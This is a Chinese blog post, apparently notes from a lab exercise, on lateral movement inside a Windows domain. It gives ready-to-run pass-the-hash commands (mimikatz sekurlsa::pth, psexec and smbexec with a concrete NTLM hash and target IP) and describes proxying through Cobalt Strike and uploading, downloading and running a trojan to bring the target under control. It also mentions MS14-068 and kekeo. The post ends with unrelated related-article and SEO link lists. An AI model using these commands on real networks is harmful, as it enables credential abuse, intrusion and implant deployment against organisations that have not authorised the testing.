当前位置: 首页 > news >正文

内网安全-横向移动PTH 哈希PTT 票据PTK 密匙Kerberos密码喷射

news 来源:原创 2025/5/22 18:57:38

一.域横向pth,mimkatz,NTLM

windwos server 2012 R2之前可能是NTLM和LM,之后为NTLM

1.mimkatz ptk

使用mimkatz进行横向移动

mimikatz sekurlsa::pth /user:administrator(目标本地用户名) /domain:192.168.3.32(目标ip) /ntlm:518b98ad4178a53695dc997aa02d455c(目标hash)

在执行命令机器弹出cmd窗口

使用该命令进行传递木马

创建bshell:

执行:

在内网攻击机器进行hash传递

cs上配置socket节点

配置代理

使用psexec进行hash传递返回被控机器shell终端:

 .\psexec.exe -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32

上线cs:

1.上传木马到web目录

2.使用cmd下载木马并且执行

使用smbexec进行传递

.\smbexec.exe  -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32

2.pth-漏洞&kekeo&Ticks

1.ms14068

2.kekeo(高权限,需要NTGM)

相关文章:

  • Nginx 配置 SSL(HTTPS)详解
  • 嵌入式学习第二十四天--网络 服务器
  • 如何使用postman来测试接口
  • 联核科技AGV无人叉车有哪些安全防护措施?
  • 「Unity3D」UGUI将元素固定在,距离屏幕边缘的某个比例,以及保持元素自身比例
  • 概念|RabbitMQ 消息生命周期 待消费的消息和待应答的消息有什么区别
  • 手机号实名认证接口:数字时代的安全与便捷保障
  • 设计模式-结构型模式-桥接模式
  • GB28181视频平台LiveGBS在设置公网IP收流时,如何自定义修改收流端口区间
  • Docker Compose 部署 steamcmd 安装奈斯服务端
  • Kafka,Mq,Redis作为消息队列使用时的差异?|消息队列
  • 计算机视觉应用|自动驾驶的感知革命:多传感器融合架构的技术演进与落地实践
  • 从零开始的python学习(五)P71+P72+P73+P74
  • Redis6.2.6下载和安装
  • ①Modbus TCP转Modbus RTU/ASCII网关同步采集无需编程高速轻松组网
  • 广告营销反欺诈
  • 【Linux】38.网络基础(2.1)
  • K8S学习之基础二十一:k8s的持久化存储之emptyDir
  • 【AI深度学习网络】Transformer时代,RNN(循环神经网络)为何仍是时序建模的“秘密武器”?
  • 【开源】OpenAL、OpenCL、OpenCV 和 OpenGL
  • 网站推广的优化/上海seo网络优化
  • 网站策划工作条件/上海网站seo外包
  • 织梦修改网站源代码/知乎软文推广
  • 软件开发大概需要多少钱/西安seo站内优化
  • 日ip 1万 网站 值多少钱/网站怎么收录到百度
  • 万网怎么建立网站/搜索量用什么工具查询